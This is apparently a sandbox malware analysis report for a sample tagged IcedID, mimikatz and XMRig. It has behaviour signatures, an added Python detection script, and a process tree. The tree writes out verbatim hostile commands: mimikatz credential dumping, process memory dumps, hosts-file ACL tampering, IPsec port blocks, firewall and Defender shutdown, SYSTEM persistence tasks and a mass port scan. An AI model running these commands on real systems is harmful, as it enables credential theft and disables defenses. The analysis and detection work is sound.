Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06-01-2025 23:53

General

  • Target

    2025-01-06_99d86107ecf4c088cd18d168dffa1344_hacktools_icedid_mimikatz.exe

  • Size

    9.6MB

  • MD5

    99d86107ecf4c088cd18d168dffa1344

  • SHA1

    def66ad9780ea3fc15eb940787ede5c883ca44d9

  • SHA256

    d7a374921f8b9db164aa1503029387dc8354ca6435542fcbb8cce5cc22c2e16b

  • SHA512

    6a77cba7ce92ec34002c4dfc201a003bbf01c0637fdb78008b9d62491c2e7b32d29c93bfcf81c586cf253209408c15cadb64f799fef8a77946c351932aaad1e2

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30504) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Reads credential material held in the memory of the LSASS process. In this run the dropped vfshost.exe is invoked with privilege::debug sekurlsa::logonpasswords, and sadefbibf.exe writes full memory dumps of a series of PIDs to C:\Windows\TEMP\zthyliniv\<pid>.dmp.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempts to enumerate network shares reachable from the host.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system. Here it sets MpsSvc, SharedAccess, WinDefend and wuauserv to start= disabled after net stop has stopped them.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems. The only ping in this run is ping 127.0.0.1 -n 5, chained before Start C:\Windows\seumlgyb\lebulsi.exe, so it functions as a delay before launching the dropped binary rather than as a connectivity check.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution. Here three tasks are registered to run every minute as SYSTEM: one relaunches C:\Windows\ime\lebulsi.exe, the other two reset the ACL on the dropped lebulsi.exe and uuetgf.exe to everyone:F.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
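
The signatures above are the sandbox's own labels. To turn them into something you can run over your own process-creation telemetry, here is an added example (not part of this report, and not any vendor's detection content) that matches the command-line patterns this sample used: cacls on the hosts file, the netsh ipsec block policy, firewall and security-service shutdown, the SYSTEM task that fires every minute, the procdump-style dump arguments, the mimikatz module names, the masscan-style port sweep, and ping-as-sleep before Start. The events are constructed from the command lines and PIDs in the process tree below; the rule names are this example's own. Caveat: the -accepteula -mp <pid> <pid>.dmp pattern fires on a full-memory dump of any process, not only LSASS, so confirm the target PID before calling it credential theft.

```python
import re
from collections import defaultdict

# Constructed process-creation events. Command lines and PIDs are copied
# from the process tree in this report; this is not the sandbox's own output.
EVENTS = [
    {"pid": 1980, "ppid": 3176, "cmd": r"cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe"},
    {"pid": 3328, "ppid": 1980, "cmd": r"ping 127.0.0.1 -n 5"},
    {"pid": 2164, "ppid": 2284, "cmd": r"cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM"},
    {"pid": 4924, "ppid": 2284, "cmd": r"netsh ipsec static add policy name=Bastards description=FuckingBastards"},
    {"pid": 1960, "ppid": 2284, "cmd": r"netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP"},
    {"pid": 1112, "ppid": 4756, "cmd": r"C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt"},
    {"pid": 4060, "ppid": 4816, "cmd": r"C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"pid": 3708, "ppid": 3992, "cmd": r'schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"'},
    {"pid": 4804, "ppid": 3040, "cmd": r"netsh firewall set opmode mode=disable"},
    {"pid": 4656, "ppid": 2316, "cmd": r"netsh Advfirewall set allprofiles state off"},
    {"pid": 1948, "ppid": 1416, "cmd": r"net stop WinDefend"},
    {"pid": 1908, "ppid": 2764, "cmd": r"sc config MpsSvc start= disabled"},
    {"pid": 1944, "ppid": 2284, "cmd": r"C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 772 C:\Windows\TEMP\zthyliniv\772.dmp"},
]

# Rule name -> regex over the command line. Names are this example's own labels.
RULES = {
    # ACL deny on the hosts file for users, administrators and SYSTEM
    "hosts_file_acl_tamper":
        r"cacls\s+\S*drivers\\etc\\hosts\b.*?/D\s+(users|administrators|system)",
    # local IPsec policy built with netsh to block inbound 135/139/445
    "ipsec_block_policy":
        r"\bnetsh\s+ipsec\s+static\s+add\s+(policy|filteraction|filter|rule)\b",
    # legacy and advfirewall forms of turning the host firewall off
    "firewall_disabled":
        r"\bnetsh\s+(advfirewall\s+set\s+allprofiles\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)\b",
    "security_service_stopped":
        r"\bnet1?\s+stop\s+(MpsSvc|WinDefend|SharedAccess|wuauserv)\b",
    "security_service_disabled":
        r"\bsc\s+config\s+(MpsSvc|WinDefend|SharedAccess|wuauserv)\s+start=\s*disabled\b",
    # task running every minute as SYSTEM (persistence / ACL reset)
    "system_task_every_minute":
        r"\bschtasks\s+/create\b.*\s/sc\s+minute\s+/mo\s+1\b.*\s/ru\s+system\b",
    # procdump-style full dump of an arbitrary PID; verify the target is lsass
    "process_memory_dump":
        r"-accepteula\s+-mp\s+\d+\s+\S+\.dmp\b",
    "mimikatz_sekurlsa":
        r"\b(privilege::debug|sekurlsa::logonpasswords)\b",
    # "-p <port> <a.b.c.d-w.x.y.z> --rate=<n>" is masscan's argument syntax
    "port_sweep":
        r"-p\s+\d+\s+\d{1,3}(\.\d{1,3}){3}-\d{1,3}(\.\d{1,3}){3}\s+--rate=\d+",
    # ping to loopback used as a sleep before launching the next stage
    "ping_delay_then_start":
        r"\bping\s+127\.0\.0\.1\s+-n\s+\d+\s*&\s*start\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}


def classify(cmdline):
    """Return the names of every rule whose pattern matches one command line."""
    return [name for name, rx in COMPILED.items() if rx.search(cmdline)]


def summarize(events):
    """Map rule name -> sorted PIDs of the events that triggered it."""
    hits = defaultdict(set)
    for ev in events:
        for name in classify(ev["cmd"]):
            hits[name].add(ev["pid"])
    return {name: sorted(pids) for name, pids in hits.items()}


def unflagged(events):
    """PIDs no rule matched; worth a look by hand (LOLBin children, delay loops)."""
    return sorted(ev["pid"] for ev in events if not classify(ev["cmd"]))


if __name__ == "__main__":
    for name, pids in summarize(EVENTS).items():
        print(f"{name:28s} {pids}")
    print("unflagged", unflagged(EVENTS))
```

Each event is matched against every rule, so one command line can carry several labels; the bare ping 127.0.0.1 -n 5 child deliberately matches nothing, which is the point of the unflagged() list: the interesting context lives in the parent cmd line, not in the ping itself.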

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2120
      • C:\Windows\TEMP\eyuduassi\uuetgf.exe
        "C:\Windows\TEMP\eyuduassi\uuetgf.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1344
    • C:\Users\Admin\AppData\Local\Temp\2025-01-06_99d86107ecf4c088cd18d168dffa1344_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-01-06_99d86107ecf4c088cd18d168dffa1344_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3176
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3328
        • C:\Windows\seumlgyb\lebulsi.exe
          C:\Windows\seumlgyb\lebulsi.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4900
    • C:\Windows\seumlgyb\lebulsi.exe
      C:\Windows\seumlgyb\lebulsi.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2284
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4512
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:1536
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2848
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1412
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1984
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2028
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2272
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4924
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2312
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3720
            • C:\Windows\zthyliniv\eftbbbiir\wpcap.exe
              C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4400
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4336
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4852
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3156
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                    PID:2924
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4288
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:5088
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1912
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1688
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2328
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2136
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                    PID:3664
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                  PID:4516
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1048
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3152
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4756
                  • C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe
                    C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1112
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:4816
                  • C:\Windows\zthyliniv\Corporate\vfshost.exe
                    C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4060
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                  2⤵
                    PID:3992
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2304
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:3708
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4736
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4524
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4476
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2608
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:388
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:5036
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4068
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1016
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:852
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3244
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:5044
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:536
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1496
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4056
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1960
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2328
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1324
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4980
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3812
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:5048
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3780
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                      PID:3040
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4804
                    • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                      C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 772 C:\Windows\TEMP\zthyliniv\772.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1944
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2316
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4656
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2164
                      • C:\Windows\SysWOW64\net.exe
                        net stop MpsSvc
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4536
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                            PID:1092
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                          PID:1416
                          • C:\Windows\SysWOW64\net.exe
                            net stop WinDefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1948
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2408
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                            PID:4052
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1632
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                  PID:1800
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config MpsSvc start= disabled
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2764
                              • C:\Windows\SysWOW64\sc.exe
                                sc config MpsSvc start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:1908
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config SharedAccess start= disabled
                              2⤵
                                PID:3136
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config SharedAccess start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:756
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config WinDefend start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2036
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WinDefend start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  PID:3708
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config wuauserv start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4168
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:3992
                              • C:\Windows\TEMP\xohudmc.exe
                                C:\Windows\TEMP\xohudmc.exe
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:3636
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 336 C:\Windows\TEMP\zthyliniv\336.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1676
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2120 C:\Windows\TEMP\zthyliniv\2120.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2588
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2656 C:\Windows\TEMP\zthyliniv\2656.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1328
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2748 C:\Windows\TEMP\zthyliniv\2748.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1324
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2816 C:\Windows\TEMP\zthyliniv\2816.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3724
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3144 C:\Windows\TEMP\zthyliniv\3144.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5116
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3848 C:\Windows\TEMP\zthyliniv\3848.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2028
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3940 C:\Windows\TEMP\zthyliniv\3940.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4880
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4044 C:\Windows\TEMP\zthyliniv\4044.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3048
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1028 C:\Windows\TEMP\zthyliniv\1028.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4548
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
